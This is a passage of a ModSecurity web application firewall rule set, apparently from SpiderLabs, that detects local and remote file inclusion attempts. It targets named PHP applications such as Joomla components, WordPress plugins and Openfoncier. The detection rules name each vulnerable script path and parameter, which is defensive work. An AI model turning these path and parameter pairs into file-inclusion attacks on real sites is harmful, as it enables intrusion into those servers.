WEB_SPECIFIC_APPS Froxlor customer_ftp.php id Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Froxlor customer_ftp.php id Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012336) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CultBooking lang parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /cultbooking.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012336,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS CultBooking lang parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:lang "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CultBooking lang parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012343) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WeBid active_auctions.php lan Parameter Local File inclusion Attempt SecRule REQUEST_LINE "@contains /active_auctions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012343,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WeBid active_auctions.php lan Parameter Local File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:lan "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WeBid active_auctions.php lan Parameter Local File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012344) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Madirish Webmail basedir Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /lib/addressbook.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012344,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Madirish Webmail basedir Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:basedir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Madirish Webmail basedir Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012345) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Frontend-User-Access controller Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012345,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Frontend-User-Access controller Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_frontenduseraccess" "chain" SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Frontend-User-Access controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012357) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla XGallery com_xgallery Component Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_xgallery/helpers/img.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012357,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla XGallery com_xgallery Component Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla XGallery com_xgallery Component Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012369) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla swMenuPro ImageManager.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /com_swmenupro/ImageManager/Classes/ImageManager.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012369,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla swMenuPro ImageManager.php Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla swMenuPro ImageManager.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012373) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Horde type Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /util/barcode.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012373,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Horde type Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:type "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Horde type Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012426) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin cloner.cron.php config Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/xcloner-backup-and-restore/cloner.cron.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012426,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin cloner.cron.php config Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,46582'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:config "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress XCloner Plugin cloner.cron.php config Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012427) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla XCloner Component cloner.cron.php config Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /administrator/components/com_xcloner-backupandrestore/cloner.cron.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012427,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla XCloner Component cloner.cron.php config Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,46582'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:config "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla XCloner Component cloner.cron.php config Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012496) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Sahana Agasti AccessController.php approot Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /mod/vm/controller/AccessController.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012496,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Sahana Agasti AccessController.php approot Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,45656'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:global[approot]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Sahana Agasti AccessController.php approot Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012497) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Sahana Agasti dao.php approot Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /mod/vm/model/dao.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012497,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Sahana Agasti dao.php approot Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,45656'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:global[approot]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Sahana Agasti dao.php approot Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012561) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Openfoncier action.class.php script Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /obj/action.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012561,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Openfoncier action.class.php script Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:path_om/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Openfoncier action.class.php script Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012562) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Openfoncier architecte.class.php script Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /obj/architecte.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012562,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Openfoncier architecte.class.php script Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:path_om/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Openfoncier architecte.class.php script Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012563) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Openfoncier avis.class.php script Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /obj/avis.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012563,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Openfoncier avis.class.php script Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:path_om/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Openfoncier avis.class.php script Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012564) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Openfoncier bible.class.php script Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /obj/bible.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012564,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Openfoncier bible.class.php script Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:path_om/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Openfoncier bible.class.php script Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012565) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Openfoncier blocnote.class.php script Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /obj/blocnote.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012565,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Openfoncier blocnote.class.php script Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:path_om/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Openfoncier blocnote.class.php script Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012571) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS jQuery Mega Menu Wordpress Plugin Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/jquery-mega-menu/skin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012571,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS jQuery Mega Menu Wordpress Plugin Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:skin "(?i:\.\.\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS jQuery Mega Menu Wordpress Plugin Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012572) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mambo Cache_Lite Class mosConfig_absolute_path Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /includes/Cache/Lite/Output.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012572,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Mambo Cache_Lite Class mosConfig_absolute_path Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mambo Cache_Lite Class mosConfig_absolute_path Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012583) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ardeaCore PHP Framework appMVCPath Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /ardeaCore/lib/core/mvc/ardeaMVC.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012583,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS ardeaCore PHP Framework appMVCPath Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:appMVCPath/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ardeaCore PHP Framework appMVCPath Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012584) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ardeaCore PHP Framework CURRENT_BLOG_PATH Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /ardeaCore/lib/core/ardeaBlog.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012584,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS ardeaCore PHP Framework CURRENT_BLOG_PATH Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:CURRENT_BLOG_PATH/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ardeaCore PHP Framework CURRENT_BLOG_PATH Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012604) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ardeaCore PHP Framework appMVCPath Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /ardeaCore/lib/core/mvc/ardeaMVC.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012604,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS ardeaCore PHP Framework appMVCPath Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:appMVCPath/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ardeaCore PHP Framework appMVCPath Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012605) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ardeaCore PHP Framework CURRENT_BLOG_PATH Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /ardeaCore/lib/core/ardeaBlog.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012605,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS ardeaCore PHP Framework CURRENT_BLOG_PATH Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:CURRENT_BLOG_PATH/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ardeaCore PHP Framework CURRENT_BLOG_PATH Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012657) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS eyeOS file Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /devtools/qooxdoo-sdk/framework/source/resource/qx/test/part/delay.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012657,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS eyeOS file Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:sleep "@contains file=" "chain" SecRule ARGS:sleep "(?i:\.\.\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS eyeOS file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012659) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_doqment Remote File inclusion Attempt SecRule REQUEST_LINE "@contains admin.ponygallery.html.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012659,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_doqment Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_doqment" "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_doqment Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012666) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla component smartformer Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /components/com_smartformer/smartformer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012666,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla component smartformer Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla component smartformer Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012668) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LoCal Calendar System LIBDIR Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /lib/lcUser.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012668,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS LoCal Calendar System LIBDIR Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:LIBDIR "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LoCal Calendar System LIBDIR Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012703) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla mod_virtuemart_latestprod module Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /modules/mod_virtuemart_latestprod/mod_virtuemart_latestprod.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012703,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla mod_virtuemart_latestprod module Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla mod_virtuemart_latestprod module Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012704) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla mod_virtuemart_featureprod module Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /modules/mod_virtuemart_featureprod/mod_virtuemart_featureprod.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012704,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla mod_virtuemart_featureprod module Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla mod_virtuemart_featureprod module Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012705) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress WP Publication file Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/wp-publication-archive/includes/openfile.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012705,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress WP Publication file Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress WP Publication file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012721) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LightNEasy File Manager language Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /plugins/filemanager/get_file.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012721,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS LightNEasy File Manager language Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:language "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LightNEasy File Manager language Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012724) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CitusCMS filePath Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /include/classes/file.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012724,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS CitusCMS filePath Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:filePath/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CitusCMS filePath Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012743) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SaurusCMS captcha_image.php script Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /extensions/saurus4/captcha_image.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012743,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS SaurusCMS captcha_image.php script Remote File 